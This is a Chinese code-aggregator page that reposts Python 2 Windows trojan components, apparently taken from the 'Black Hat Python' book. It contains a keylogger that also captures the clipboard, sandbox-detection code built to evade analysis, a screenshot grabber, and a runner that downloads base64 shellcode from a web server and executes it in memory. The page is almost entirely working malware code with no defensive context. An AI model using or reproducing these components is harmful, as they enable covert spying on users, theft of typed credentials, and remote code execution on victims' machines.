python Windows Trojan-BH_Python
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了python Windows Trojan-BH_Python相关的知识,希望对你有一定的参考价值。
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
def get_current_process():
# get a handle to the foreground window
hwnd = user32.GetForegroundWindow()
# find the process ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
# store the current process ID
process_id = "%d" % pid.value
# grab the executable
executable = create_string_buffer("\x00" * 512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
# now read it's title
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(window_title),512)
# print out the header if we're in the right process
print
print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value)
print
# close handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
def KeyStroke(event):
global current_window
# check to see if target changed windows
if event.WindowName != current_window:
current_window = event.WindowName
get_current_process()
# if they pressed a standard key
if event.Ascii > 32 and event.Ascii < 127:
print chr(event.Ascii),
else:
# if [Ctrl-V], get the value on the clipboard
# added by Dan Frisch 2014
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print "[PASTE] - %s" % (pasted_value),
else:
print "[%s]" % event.Key,
# pass execution to next hook registered
return True
# create and register a hook manager
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
# register the hook and execute forever
kl.HookKeyboard()
pythoncom.PumpMessages()
import ctypes
import random
import time
import sys
user32 = ctypes.windll.user32
kernel32 = ctypes.windll.kernel32
keystrokes = 0
mouse_clicks = 0
double_clicks = 0
class LASTINPUTINFO(ctypes.Structure):
_fields_ = [("cbSize", ctypes.c_uint),
("dwTime", ctypes.c_ulong)
]
def get_last_input():
struct_lastinputinfo = LASTINPUTINFO()
struct_lastinputinfo.cbSize = ctypes.sizeof(LASTINPUTINFO)
# get last input registered
user32.GetLastInputInfo(ctypes.byref(struct_lastinputinfo))
# now determine how long the machine has been running
run_time = kernel32.GetTickCount()
elapsed = run_time - struct_lastinputinfo.dwTime
print "[*] It's been %d milliseconds since the last input event." % elapsed
return elapsed
def get_key_press():
global mouse_clicks
global keystrokes
for i in range(0,0xff):
if user32.GetAsyncKeyState(i) == -32767:
# 0x1 is the code for a left mouse click
if i == 1:
mouse_clicks += 1
return time.time()
else:
keystrokes += 1
return None
def detect_sandbox():
global mouse_clicks
global keystrokes
max_keystrokes = random.randint(10,25)
max_mouse_clicks = random.randint(5,25)
double_clicks = 0
max_double_clicks = 10
double_click_threshold = 0.250
first_double_click = None
average_mousetime = 0
max_input_threshold = 30000
previous_timestamp = None
detection_complete = False
last_input = get_last_input()
# if we hit our threshold let's bail out
if last_input >= max_input_threshold:
sys.exit(0)
while not detection_complete:
keypress_time = get_key_press()
if keypress_time is not None and previous_timestamp is not None:
# calculate the time between double clicks
elapsed = keypress_time - previous_timestamp
# the user double clicked
if elapsed <= double_click_threshold:
double_clicks += 1
if first_double_click is None:
# grab the timestamp of the first double click
first_double_click = time.time()
else:
# did they try to emulate a rapid succession of clicks?
if double_clicks == max_double_clicks:
if keypress_time - first_double_click <= (max_double_clicks * double_click_threshold):
sys.exit(0)
# we are happy there's enough user input
if keystrokes >= max_keystrokes and double_clicks >= max_double_clicks and mouse_clicks >= max_mouse_clicks:
return
previous_timestamp = keypress_time
elif keypress_time is not None:
previous_timestamp = keypress_time
detect_sandbox()
print "We are ok!"
import win32gui
import win32ui
import win32con
import win32api
# grab a handle to the main desktop window
hdesktop = win32gui.GetDesktopWindow()
# determine the size of all monitors in pixels
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
# create a device context
desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
# create a memory based device context
mem_dc = img_dc.CreateCompatibleDC()
# create a bitmap object
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
# copy the screen into our memory device context
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
# save the bitmap to a file
screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')
# free our objects
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())import urllib2
import ctypes
import base64
# retrieve the shellcode from our web server
url = "http://localhost:8000/shellcode.bin"
response = urllib2.urlopen(url)
# decode the shellcode from base64
shellcode = base64.b64decode(response.read())
# create a buffer in memory
shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))
# create a function pointer to our shellcode
shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(ctypes.c_void_p))
# call our shellcode
shellcode_func()以上是关于python Windows Trojan-BH_Python的主要内容,如果未能解决你的问题,请参考以下文章
Windows 上的 python 多处理,如果 __name__ == "__main__"
如何在 Windows 10 中从 bash 提示符运行 python '__main__' 程序文件?